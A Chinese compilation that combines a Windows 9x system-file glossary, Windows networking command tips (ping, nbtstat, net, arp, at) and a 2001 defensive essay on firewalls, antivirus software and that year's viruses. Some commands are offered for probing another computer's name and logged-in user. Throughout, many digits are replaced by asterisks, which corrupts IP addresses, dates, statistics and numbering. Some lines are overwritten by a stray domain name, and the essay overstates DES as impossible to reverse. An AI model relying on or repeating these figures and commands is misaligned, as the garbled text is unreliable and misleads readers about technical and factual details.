  SETUPX.DLL - 安装支持

  SETVER.EXE - MSDOS版本显示,该程序可在网络上执行

  SF*029.EXE - 打印机驱动

  SHARE.EXE - MSDOS共享实用程序

  SHELL.INF - 安装壳信息

  SHELL.VXD - 虚拟壳设备

  SHELL2.INF - 颜色组合

  SHELL*.INF - 颜色组合

  SIZE1-1.CUR - 光标

  SIZE1-M.CUR - 光标

  SIZE*-M.CUR - 光标

  SIZENESW.ANI - 活动光标

  SIZEWE.ANI- 活动光标

  SKPSFA-1.SPD - 打印机驱动

  SLAN.DOS - 网络适配器驱动

  SLCD*2.MPD - SCSI驱动器

  SLENH.DLL - 高级节能选项

  SMALLE.FON - 字型文件

  SMALLF.FON - 字型文件

  SMARTDRV.EXE - 超高速缓存程序

  SMARTND.DOS - 网络适配器驱动器

  SMC*000.DOS - 网络适配器驱动器

  SMC9000.VXD - 网络适配器驱动器

  SNAPSHOT.EXE - 抽点

  SNAPSHOT.VXD - 抽点虚拟设备

  SNDREC*2.EXE - 录音机

  SNIP.VXD - 网络适配驱动器

  SOCKET.VXD - Windows虚拟Socket网卡驱动器SOCKET.VXD PCMCIA支持

  SOL.CNT - 纸牌游戏

  SOL.HLP - 纸牌游戏帮助文件

  SORT.EXE - MSDOS分类实用程序

  SOUNDREC.CNT - 录音机帮助文件内容

  SOUNDREC.HLP - 录音机帮助文件

  SPARROW.WPD - SCSI驱动器

  SPARROWX.MPD - SCSI驱动器

  SPOOL*2.EXE - 打印机支持

  SPOOLER.VXD - 打印机共享虚拟设备

  SRAMMTD.VXD - PCMCIA支持

  SSERIFE.FON - 字型文件

  SSERIFF.FON - 字型文件

  SSFLYWIN.SCR - 屏幕保护

  SSSTARS.SCR - 屏幕保护

  STAR2*E.DRV - 打印机驱动

  STAR9E.DRV - 打印机驱动

  START.EXE - 启动程序

  STATE.PBK - Microsoft网络组件

  STDOLE.TLB - OLE2.0文件

  STDOLE*2.TLB - OLE2-*2文件

  STEMO*09.DLL - Windows9*帮助文件的DLL

  STLSO*SS.SPD - 打印机驱动程序

  STLS*77U.SPD - 打印机驱动程序

  STORAGE.DLL - OLE存储器管理库

  STRN.DOS - 网络适配器驱动

  SUBST.EXE - MSDOS Subst实用程序

  SUEXPAND.DLL - LZ DLL安装

  SUHELPER.BIN - 安装支持

  SUPERVGA.DRV - 高级VGA显示驱动

  SURPORT.TXT - PSS支持信息

  SVCPROP.DLL - Microsoft网络组件

  SVRAPI.DLL - *2位公用服务器API实用程序

  SXCIEXT.DLL - Matrox显示驱动支持文件

  SYMBOLE.FON - 字型文件

  SYS.COM - MSDOS系统实用程序

  SYSCLASS.DLL - 系统类库安装

  SYSDETMG.DLL - 系统检测库

  SYSEDIT.EXE - 系统编辑器

  SYSLOGO.RLE - 系统标识

  SYSMON.EXE - 系统监控程序

  SYSMON.HLP - 系统监控帮助

  SYSTEM.DRV - 最小Win*.1标准模式

  SYSTHUNK.DLL - Windows系统形实替换程序库

  SYSTRAY.EXE - 高级节能管理

  T ↑

  T12*.MPD - SCSI驱动器

  T1*0.MPD - SCSI驱动器

  T20N*.VXD - 网络适配驱动器

  T*0ND.DOS - 网络适配驱动器

  T***.MPD - SCSI驱动器

  TADA.WAV - 声音文件

  TAPI.DLL - API通话程序

  TAPI.INF - API通话安装信息文件

  TAPI*2.DLL - *2位形实替换

  TAPIADDR.DLL - API通话程序

  TAPIEXE.EXE - API通话组件

  TAPIINI.EXE - API通话组件

  TASKMAM.EXE - 任务管理器

  TCCARC.DOS - 网络适配驱动器

  TCTOKCH.VXD - 网络适配驱动器

  TELEPHON.CPL - 通话帮助

  TESTPS.TXT - PostScript测试

  TEXTCHAT.EXE - Microsoft网络组件

  THEMIC-1.WAV - 声音文件

  THINKJET.DRV - 打印机驱动

  THREED.VBX - Windows9*浏览

  T1**0.DRV - 打印机驱动

  TIMEDATE.CPL - 时间/日期控制面板

  TIMES.TTF - 时间字型

  TIMESBD.TTF - 时间粗体字型

  TIMESBI.TTF - 时间粗斜体字型

  TIMESI.TTF - 时间斜体字型

  TIMEZONE.INF - 安装信息

  TIMLP2*2.SPD - 打印机驱动

  TIPS.txt - 提示和技巧自述文件

  TKPHZR*2.SPD - 打印机驱动

  TLNK.DOS - 网络适配驱动器

  TLNK*.VXD - 网络适配驱动器

  TMV1.MPD - SCSI驱动器

  TOOLHELP.DLL - 1*位开发工具帮助器

  TOSHIBA.DRV - 打印机驱动

  TOUR.EXE - 浏览文件

  TPHAIII.ICM - 打印机简介

  TRACERT.EXE - TCP/IP IRACEROUTE命令

  TREE.COM - MS DOS树实用程序

  TREEEDCL.DLL - Microsoft网络组件

  TREENVCL.DLL - Microsoft网络组件

  TRIUMPHI.SPD - 打印机驱动

  TSD*2.DLL - 声音压缩管理器

  TSENG.DRV - ET*000W*2显示驱动

  TTY.DRV - 打印机驱动

  TTY.HLP - TTY打印机驱动帮助

  TYPELIB.DLL - OLE2.0

  U ↑

  U9*1**70.SPD - 打印机驱动

  UBNEI.DOS - 网络适配器驱动

  ULTRA12*.MPD - SCSI驱动器

  ULTRA2*F.MPD - SCSI驱动器

  UMDM1*.DLL - 通用调制解调器驱动组件

  UMDM*2.DLL - 通用调制解调器驱动组件

  UNIDRV.DLL - Microsoft通用打印机驱动库

  UNIDRV.HLP - 通用打印机驱动帮助

  UNIMODEM.VXD - 通用调制解调器驱动

  USER*2.DLL - *2位用户

  V ↑

  V**MMGR.VXD - V**MMGR虚拟设备

  VCACHE.VXD - VCache虚拟设备

  VCD.VXD - 虚拟COM驱动程序

  VCOMM.VXD - VCOMM驱动程序

  VCOND.VXD - Win*2控制台

  VDMAD.VXD - VDMAD虚拟设备

  VER.DLL - 小型Win*.1安装程序1*位版动态链接库

  VER.NEW - 版本检测与文件安装库

  VERSION.DLL - *2位版本动态链接库

  VERX.DLL - 安装程序使用的版本动态库

  VFAT.VXD - VFAT文件系统

  VFD.VXD - 软盘虚拟设备

  VFLATD.VXD - 虚拟平板帧缓存虚拟设备

  VGA.DRV - VGA显示驱动程序

  VIDCAP.INF - 即插即用VCD信息

  VIDEOT.VXD - 视频虚拟设备

  VIP.*** - TCP/IP虚拟IP设备

  VJOYD.VXD - 游戏棒虚拟设备

  VKD.VXD - 虚拟键盘设备

  VLB*2.DLL - Mail/Exchange组件

  VMD.VXD - Win*.1虚拟鼠标驱动程序

  VMM.VXD - 虚拟存储管理设备

  VMM*2.VXD - 虚拟存储管理设备

  VMOUSE.VXD - 虚拟鼠标驱动程序

  VNBT.*** - NetBIOS传输驱动程序

  VNETBIOS.VXD - VNETBIOS虚拟设备

  VNETSUP.VXD - 网络支持虚拟设备

  VPD.VXD - 虚拟LPT驱动程序

  VPICD.VXD - 虚拟可编程干扰控制器设备

  VPOWERD.VXD - 高级电源管理虚拟设备

  VREDIR.VXD - Microsoft网络*2位客户端程序

  VSAMI.DLL - AMI文件语法分析程序

  VSASC*.DLL - ASCII文件语法分析程序

  VSBMP.DLL - BMP文件语法分析程序

  VSERVER.VXD - Microsoft网络*2位服务器端程序

  VSGIF.DLL - GIF文件语法分析程序

  VSHARE.VXD - *2位共享虚拟设备驱动程序

  VSMSW.DLL - Win写文件语法分析

  VSPP.DLL - PowerPoint语法分析程序

  VSRTF.DLL - RTF文件语法分析程序

  VSTIFF.DLL - TIFF文件语法分析程序

  VSW*.DLL - Word*文件语法分析程序

  VSWORD.DLL - Word文件语法分析程序

  VSWP*.DLL - WordPerfect*文件语法分析程序

  VSXL*.DLL - Excel文件/图表语法分析程序

  VTCP.*** - TCP/IP虚拟TCP驱动程序

  VTDAPI.VXD - VTDAPI虚拟设备

  VTDI.*** - 传输驱动接口支持程序

  VXDLDR.VXD - 虚拟设备驱动程序装载器

  W ↑

  WAVE.INF - 即插即用音波设备信息

  WDTOOOEX.MPD - SCSI驱动

  WGPOADMN.DLL - Mail/Exchange组件

  WHLP1*T.DLL - 帮助动态链接库

  WIN*7EM.DLL - *0**7数学仿真库

  WINABC.HLP - 智能ABC帮助文件

  WINBX.HLP - 表形码输入法帮助文件

  WINCHA.HLP - 繁体仓颉输入法帮助文件

  WINDOWS.CNT - Windows9*帮助文件内容

  WINDOWS.HLP - Windows9*帮助文件

  WINFILE.CNT - 文件管理器帮助文件内容

  WINFILE.EXE - Windows工作组文件管理器

  WINFILE.HLP - 文件管理器帮助文件

  WINGB.HLP - 区位码输入法帮助文件

  WINHLP2*.HLP - Windows帮助文件

  WINIME.HLP - *作指南帮助文件

  WINNM.HLP - GBK内码输入法帮助文件

  WININIT.EXE - Windows初始化文件

  WINIPCFG.EXE - TCP/IP配置工具

  WINNEWS.TXT - Winnews信息

  WINPHO.HLP - 繁体注音输入法帮助文件

  WINPOPUP.EXE - POPUP工具

  WINREG.DLL - 远程注册支持

  WINPY.HLP - 全拼输入法帮助文件

  WINSOCK.DLL - Windows的套接API

  WINSY.HLP - 双拼输入法帮助文件

  WINXSP.HLP - GBK双拼输入法帮助文件

  WINXZM.HLP - GBK郑码输入法帮助

  WINZM.HLP - 郑码输入法帮助文件

  WNASPI*2.DLL - Windows DLL*2位ASPI

  WPSUNI.DRV - 传真驱动程序

  WPSUNIRE.DLL - WPS主机资源执行程序

  X ↑

  XCOPY.EXE - DOS XCOPY工具

  XCOPY*2.EXE - 文件拷贝程序

  XGA.DRV - XGA显示驱动程序

  1.最基本,最常用的,测试物理网络的

    ping 192.1**.0.* -t ,参数-t是等待用户去中断测试

  2.查看DNS、IP、Mac等

    A.Win9*:winipcfg

    B.Win2000以上:Ipconfig/all

    C.NSLOOKUP:如查看河北的DNS

    C:\nslookup

021yin.com

    Address: 202.99.1*0.**

    server 202.99.*1.2 则将DNS改为了*1.2

021yin.com

021yin.com

    Address: 202.99.1*0.**

    Non-authoritative answer:

021yin.com

    Address: 202.99.1*0.212

  *.网络信使

    Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段

    net stop messenger 停止信使服务,也可以在面板-服务修改

    net start messenger 开始信使服务

  *.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理)

    ping -a IP -t ,只显示NetBios名

    nbtstat -a 192.1**.10.1** 比较全的

021yin.comstat -a 显示出你的计算机当前所开放的所有端口

    netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等

  *.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址

    arp -a

  7.在代理服务器端

    捆绑IP和MAC地址,解决局域网内盗用IP!:

    ARP -s 192.1**.10.*9 00 -*0-ff-*c-0*-7*

    解除网卡的IP与MAC地址的绑定:

    arp -d 网卡IP

  *.在网络邻居上隐藏你的计算机

    net config server /hidden:yes

    net config server /hidden:no 则为开启

  9.几个net命令

    A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。

    比如:查看这个IP上的共享资源,就可以

    C:\net view 192.1**.10.*

    在 192.1**.10.* 的共享资源

    资源共享名 类型 用途 注释

    网站服务 Disk

    命令成功完成。

    B.查看计算机上的用户帐号列表 net user

    C.查看网络链接 net use

    例如:net use z: \192.1**.10.*\movie 将这个IP的movie共享目录映射为本地的Z盘

    D.记录链接 net session

    例如: C:\net session

    计算机 用户名 客户类型 打开空闲时间

    \192.1**.10.110 ROME Windows 2000 219* 0 00:0*:12

    \192.1**.10.*1 ROME Windows 2000 219* 0 00:00:*9

    命令成功完成。

  10.路由跟踪命令

021yin.com

021yin.com 除了显示路由外,还提供*2*S的分析,计算丢失包的%

  11.关于共享安全的几个命令

    A.查看你机器的共享资源 net share

    B.手工删除共享(可以编个bat文件,开机自运行,把共享都删了!)

    net share c$ /d

    net share d$ /d

    net share ipc$ /d

    net share admin$ /d

    注意$后有空格。

    C.增加一个共享:

    c:\net share mymovie=e:\downloads\movie /users:1

   mymovie 共享成功。

    同时限制链接用户数为1人。

  12.在DOS行下设置静态IP

    A.设置静态IP

    CMD

    netsh

    netshint

    interfaceip

    interface ipset add "本地链接" static IP地址 mask gateway

    B.查看IP设置

    interface ipshow address

    Arp

    显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。

    语法

    arp [-a [InetAddr] [-N IfaceAddr]]

   [-g [InetAddr] [-N IfaceAddr]]

   [-d InetAddr [IfaceAddr]]

   [-s InetAddr EtherAddr [IfaceAddr]]

    参数

    -a [InetAddr] [-N IfaceAddr]

    显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。

    -g [InetAddr] [-N IfaceAddr]

    与 -a 相同。

    -d InetAddr [IfaceAddr]

    删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号(*) 通配符代替 InetAddr。

    -s InetAddr EtherAddr [IfaceAddr]

    向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。

    在命令提示符显示帮助。

    注释

    InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。

    物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-*F-2A-9C)。

    通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。

  只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。

    范例

    要显示所有接口的 ARP 缓存表,可键入:

    arp -a

    对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:

    arp -a -N 10.0.0.99

    要添加将 IP 地址 10.0.0.*0 解析成物理地址 00-AA-00-*F-2A-9C 的静态 ARP 缓存项,可键入:

    arp -s 10.0.0.*0 00-AA-00-*F-2A-9C

    At

    计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。

    语法

    at [\ComputerName] [{[ID] [/delete] /delete [/yes]}]

    at [[\ComputerName] hours:minutes [/interactive] [{/every:date[,...] /next:date[,...]}]

  command]

    参数

     \computername

    指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。

    ID

    指定指派给已计划命令的识别码。

    /delete

    取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。

    /yes

    删除已计划的事件时,对来自系统的所有询问都回答“是”。

    hours:minutes

    指定命令运行的时间。该时间用 2* 小时制(即从 00:00 [午夜] 到 2*:*9)的 小时: 分钟格式表示。

    /interactive

    对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。

    /every:

    在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。

    date

    指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或

  一个月中的某日或多日(即,键入从 1 到*1 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at

  使用该月的当前日。

    /next:

    在下一个指定日期(比如,下一个星期四)到来时运行 command。

    command

021yin.com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。

    在命令提示符显示帮助。

    注释

    Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅“相关主题

    使用 at

    使用 at 命令时,要求您必须是本地 Administrators 组的成员。

  -- 作者: wjqmll

  -- 发布时间: 200*/01/0* 10:**am

  黑客对服务器进行扫描是轻而易举的,一旦找到了服务器存在的问题,那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描,本节我将谈谈如何才能让自己的服务器免遭黑客扫描。

  一、防范黑客心得体会:

   1、屏蔽可以IP地址:

   这种方式见效最快,一旦网络管理员发现了可疑的IP地址申请,可以通过防火墙屏蔽相对应的IP地址,这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点,例如很多黑客都使用的动态IP,也就是说他们的IP地址会变化,一个地址被屏蔽,只要更换其他IP仍然可以进攻服务器,而且高级黑客有可能会伪造IP地址,屏蔽的也许是正常用户的地址。

   2、过滤信息包:

   通过编写防火墙规则,可以让系统知道什么样的信息包可以进入、什么样的应该放弃,如此一来,当黑客发送有攻击性信息包的时候,在经过防火墙时,信息就会被丢弃掉,从而防止了黑客的进攻。但是这种做法仍然有它不足的地方,例如黑客可以改变攻击性代码的形态,让防火墙分辨不出信息包的真假;或者黑客干脆无休止的、大量的发送信息包,知道服务器不堪重负而造成系统崩溃。

   *、修改系统协议:

   对于漏洞扫描,系统管理员可以修改服务器的相应协议,例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的,这个数值如果是200则表示文件存在于服务器上,如果是*0*则表明服务器没有找到相应的文件,但是管理员如果修改了返回数值、或者屏蔽*0*数值,那么漏洞扫描器就毫无用处了。

   *、经常升级系统版本:

   任何一个版本的系统发布之后,在短时间内都不会受到攻击,一旦其中的问题暴露出来,黑客就会蜂拥而致。因此管理员在维护系统的时候,可以经常浏览著名的安全站点,找到系统的新版本或者补丁程序进行安装,这样就可以保证系统中的漏洞在没有被黑客发现之前,就已经修补上了,从而保证了服务器的安全。

   *、及时备份重要数据:

   亡羊补牢,如果数据备份及时,即便系统遭到黑客进攻,也可以在短时间内修复,挽回不必要的经济损失。想国外很多商务网站,都会在每天晚上对系统数据进行备份,在第二天清晨,无论系统是否收到攻击,都会重新恢复数据,保证每天系统中的数据库都不会出现损坏。数据的备份最好放在其他电脑或者驱动器上,这样黑客进入服务器之后,破坏的数据只是一部分,因为无法找到数据的备份,对于服务器的损失也不会太严重。

   然而一旦受到黑客攻击,管理员不要只设法恢复损坏的数据,还要及时分析黑客的来源和攻击方法,尽快修补被黑客利用的漏洞,然后检查系统中是否被黑客安装了木马、蠕虫或者被黑客开放了某些管理员账号,尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净,防止黑客的下一次攻击。

   *、使用加密机制传输数据:

   对于个人信用卡、密码等重要数据,在客户端与服务器之间的传送,应该仙经过加密处理在进行发送,这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制,都已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如DES加密方法,这是一套没有逆向破解的加密算法,因此黑客的到了这种加密处理后的文件时,只能采取暴力破解法。个人用户只要选择了一个优秀的密码,那么黑客的破解工作将会在无休止的尝试后终止。

  二、防火墙使用说明:

   1.什么是防火墙?

   防火墙的英文叫做firewall,它能够在网络与电脑之间建立一道监控屏障,保护在防火墙内部的系统不受网络黑客的攻击。逻辑上讲,防火墙既是信息分离器、限制器,也是信息分析器,它可以有效地对局域网和Internet之间的任何活动进行监控,从而保证局域网内部的安全。

   网络上最著名的软件防火墙是LockDown2000,这套软件需要经过注册才能获得完整版本,它的功能强大,小到保护个人上网用户、大到维护商务网站的运作,它都能出色的做出惊人的表现。但因为软件的注册需要一定费用,所以对个人用户来说还是选择一款免费的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人电脑使用的网络安全程序,它能够抵挡网络入侵和攻击,防止信息泄露。

   2、天网防火墙的基本功能:

   天网防火墙个人版把网络分为本地网和互联网,可以针对来自不同网络的信息,来设置不同的安全方案,以下所述的问题都是针对互联网而言的,故所有的设置都是在互联网安全级别中完成的。 怎样防止信息泄露? 如果把文件共享向互联网开放,而且又不设定密码,那么别人就可以轻松的通过互联网看到您机器中的文件,如果您还允许共享可写,那别人甚至可以删除文件。 你可以在个人防火墙的互联网安全级别设置中,将NETBIOS 关闭,这样别人就不能通过INTERNET访问你的共享资源了(这种设置不会影响你在局域网中的资源共享)。

   当拨号用户上网获得了分配到的IP地址之后,可以通过天网防火墙将ICMP关闭,这样黑客用PING的方法就无法确定使用者的的系统是否处于上网状态,无法直接通过IP地址获得使用者系统的信息了。

   需要指出的是:防火墙拦截的信息并不完全是攻击信息,它记录的只是系统在安全设置中所拒绝接收的数据包。在某些情况下,系统可能会收到一些正常但又被拦截的数据包,例如某些路由器会定时发出一些IGMP包等;或有些主机会定时PING出数据到本地系统确认连接仍在维持着,这个时候如果利用防火墙将ICMP和IGMP屏蔽了,就会在安全记录中见到这些被拦截的数据包,因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。

   *、使用防火墙的益处:

   使用防火墙可以保护脆弱的服务,通过过滤不安全的服务,Firewall可以极大地提高网络安全和减少子网中主机的风险。例如,Firewall可以禁止NIS、NFS服务通过,同时可以拒绝源路由和ICMP重定向封包。

   另外防火墙可以控制对系统的访问权限,例如某些企业允许从外部访问企业内部的某些系统,而禁止访问另外的系统,通过防火墙对这些允许共享的系统进行设置,还可以设定内部的系统只访问外部特定的Mail Server和Web Server,保护企业内部信息的安全。

   *、防火墙的种类:

   防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型:

   (1)数据包过滤

   数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择,选择的依据是系统内设置的过滤逻辑,被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地址、目的地址、所用的端口号、协议状态等因素,或它们的组合来确定是否允许该数据包通过。 数据包过滤防火墙逻辑简单,价格便宜,易于安装和使用,网络性能和透明性好,它通常安装在路由器上。路由器是内部网络与Internet连接必不可少的设备,因此在原有网络上增加这样的防火墙几乎不需要任何额外的费用。

   数据包过滤防火墙的缺点有二:一是非法访问一旦突破防火墙,即可对主机上的软件和配置漏洞进行攻击;二是数据包的源地址、目的地址以及IP的端口号都在数据包的头部,很有可能被窃听或假冒。

   (2)应用级网关

   应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针对特定的网络应用服务协议使用指定的数据过滤逻辑,并在过滤的同时,对数据包进行必要的分析、登记和统计,形成报告。实际中的应用网关通常安装在专用工作站系统上。

   数据包过滤和应用网关防火墙有一个共同的特点,就是它们仅仅依靠特定的逻辑判定是否允许数据包通过。一旦满足逻辑,则防火墙内外的计算机系统建立直接联系,防火墙外部的用户便有可能直接了解防火墙内部的网络结构和运行状态,这有利于实施非法访问和攻击。

   (*)代理服务

   代理服务(Proxy Service)也称链路级网关或TCP通道(Circuit Level Gateways or TCP Tunnels),也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术,其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外计算机系统间应用层的" 链接",由两个终止代理服务器上的" 链接"来实现,外部计算机的网络链路只能到达代理服务器,从而起到了隔离防火墙内外计算机系统的作用。此外,代理服务也对过往的数据包进行分析、注册登记,形成报告,同时当发现被攻击迹象时会向网络管理员发出警报,并保留攻击痕迹。

  三、防病毒从杀毒开始:

   2001年的七、八两月对反病毒厂家无疑是一段"幸福时光",先后爆发的Sircam和"红色代码"让国内的杀毒厂家们忙的不亦乐乎,上门求助的用户络绎不绝,代理商的订货单频频发来,用火爆形容此时的杀毒行业一点也不为过。病毒横行互联网并不一定是黑客所谓,但这也同样影响着互联网的安全,所以要做好网络安全工作还要时刻警惕病毒的产生。

   使用好的杀毒软件是防范病毒的明智选择,一个商家如何让自己的杀毒软件立于不败之地、一个用户如何选择优秀的杀毒软件?这些问题主要从下面三个方面来衡量:

   1、迅速消灭病毒

   从2001年*月至今,CIH、"欢乐时光"、"陷阱"、Sircam和红色代码病毒在世界各地大面积疯狂肆虐,对让人心有余悸的CIH,众多杀毒厂家已有了充分准备,但真正让他们经受考验的是紧随其后的几个恶性病毒。

   当这些病毒在国内出现苗头之际,兼备国内和国际病毒库的江民公司迅速查杀并发布了解决方案和升级程序,及时消灭了这些恶性病毒,将广大计算机用户的损失减小到最低程度。据江民公司技术人员透露,近来江民网站的访问量急剧上升,大量的计算机用户到江民网站了解病毒知识、下载升级程序、学习杀毒方法。这些现象都说明实效性对衡量杀毒软件好坏起到至关重要的影响。

   2、软件升级方便

   病毒的不可预期使得频频升级成了杀毒软件一大特点。而性能稳定,升级方便,则无疑会使用户在病毒到来时没有后顾之忧。例如网络上各种新病毒的产生,随之而来的是全新的杀毒概念——网络杀毒,用户上网通过浏览器就可以检测自己的系统中是否存在病毒、并进行清除,这对于今后的杀毒市场无疑是一个新方向、新概念。

   网络杀毒具有更高的时效性,并且可以轻松升级杀毒软件的病毒识别库,软件升级方便,让更多的病毒在没有大面积流行之前就断绝了它的传播途径,这种杀毒新概念的优越性是显而易见的。

   *、技术引领潮流

   说到底,技术还是决定一个杀毒软件的命脉。在反病毒领域,技术是检验真理的唯一标准。

   杀毒软件的牌子是杀出来的,谁最能杀,谁最能防,谁能在病毒发作后恢复丢失的文件和数据,谁又能引导该行业的技术潮流,不断推陈出新,与国际领先水平相比毫不逊色,谁就是最终的胜者,这也是广大计算机用户多年来形成的检验标准。如果哪个杀毒软件因为一点小漏洞给用户带来损失,那它自然就会失宠。

   占用资源少,扫描速度快,杀毒能力强,这是广大用户心目中理想的杀毒软件模型。对于网络蠕虫病毒查杀、宏病毒查杀、邮件防毒、未知病毒查杀、硬盘修复、智能升级和防黑客等在国际上领先的技术,是今天成功杀毒软件必不可少的功能。

  四、2001年流行病毒一览:

   这本《攻学兼防》是2001年*月写成的,而面对网络的瞬息万变,我也没有能力预测今后若干年会出现什么变故,因而只能做个简单的抛砖引玉,看看病毒流行和防范工作是如何进行的。

   公安部日前指出,目前我国计算机系统遭病毒感染和破坏的情况比较严重。据最近的一次调查表明,我国约7*%的计算机用户曾感染过病毒,其中感染三次以上的用户高达*9%,而且病毒的破坏性较大,全部数据被病毒破坏的占1*%,部分损失的占*7%。

   在随后美国一家反病毒公司的调查中显示,*1%的调查者安装了杀毒软件,但这一部分人中,只有2*%的人至少每月升级一次杀毒软件来防止最新病毒。而真正令人担忧的是,即使知道最近潜伏病毒威胁,比如Sircam、红色代码等病毒,大多数调查者仍然表示没有兴趣改变他们的在线安全习惯。

   从以上数据不难看出,全球的计算机信息安全问题依然任重道远,仍有许多计算机用户因缺乏足够的防范病毒意识和知识使病毒得以横行。这一点在我国更为明显,尤其是7、*月份以来,一些用户屡遭几种复发率较高的病毒如"欢乐时光"、CIH等的毒手。日前,国内权威反病毒专家王江民指出,虽然近期国内暂时没有大的疫情出现,但7、*月份延续而来的病毒高发期并没有过去, 9月,计算机用户应密切关注反病毒厂家的动态信息,重点防范四大病毒。

   1、“欢乐时光”首当其冲

   “欢乐时光”是今年*月底出现的一种通过电子邮件传播的vbs/HTM蠕虫类病毒,这种针对微软信件浏览器的弱点而编写的病毒已经被公认为上半年国内最具危险性的十大恶性病毒之一,它的传播性和危害性丝毫不比7、*月份流行的Sircam和"红色代码"逊色,而且它的复发率极强,当染毒计算机的日期为日+月=1*时,该病毒就会死灰复燃。自*月*日第一次大规模爆发以来,尽管该病毒已被广大用户所熟知,但由于该病毒在感染上的特殊性,即作为邮件内容而不是作为附件传染,而且还有可能通过浏览被感染网站而遭受感染,所以几个月来,被该病毒感染的用户数量始终不减。

   2、Sircam“毒”占鳌头

   相信“Hi! How are you?”、“See you later.Thanks”这样的句子大家早已不再陌生了,这就是不断在肆意散发用户邮件及机密文档,但因只占用资源并未出现较大危害而使得许多用户在感染后还不知道的Sircam病毒。

   Sircam病毒是一种首发于英国的恶性网络蠕虫病毒,主要通过电子邮件附件进行传播,目前有A,B,C*个变种,在传播自身的同时,它也要大量将用户的DOC、XLS、ZIP文档的前部贴上病毒体后再通过互联网到处乱发,已有相当多的说什么机密文档和企业资料被泄密。如果受感染的机器上的日期的格式是:日/月/年的话,那么在每年的10月1*日该网络蠕虫程序会将C盘上的所有文件以及目录删除;在该网络蠕虫程序发现自身不完全时,该网络蠕虫程序就会将WINDOWS安装目录所在的驱动器上的文件和所有的子目录完全删除;同时还会在系统的回收站中写入文件:Sircam.sys一直到硬盘的剩余空间为零。

   Sircam病毒在感染电脑后会自我复制,然后根据受感染电脑内的电子邮件地址寄出副本,并随机夹带出一个档案。同时该病毒并不针对任何特定的电子邮件软件,如微软(Microsoft)的Outlook等,该病毒拥有自己的电子邮件引擎,所以可能感染任何电子邮件的使用者。因此Sircam病毒比专家预期的更难以对付且存活时间更长,可以断言,该病毒在未来一段时期内仍将是全球电脑用户的头号大敌,对该病毒的防范意识和措施应继续加强。

   *、“红色代码”阴魂不散

   2001年*月份,尽管危害性最强的是迅速蹿至全球头号杀手的Sircam,尽管有权威专家在人们谈红色变时及时出来降了温,但近日“红色代码”再生变种的消息又让心有余悸的人不禁胆寒。

   公安部近期对“红毒”专门发布的通告称,“红色代码Ⅱ”病毒是一种具有严重危害后果的恶性病毒,该病毒具有传播速度快、可造成网络通讯阻塞、服务器瘫痪、含黑客远程控制程序等特征,它主要威胁使用Windows2000或NT操作系统的局域网、企业网和互联网,但没有像最近社会上传说的那样对全国网络系统造成巨大影响。截止2001年*月22日,我国受“红色代码Ⅱ”病毒感染的单位近*00家,服务器1000余台,涉及全国20多个省区市。

   *、Funlove死缠烂打

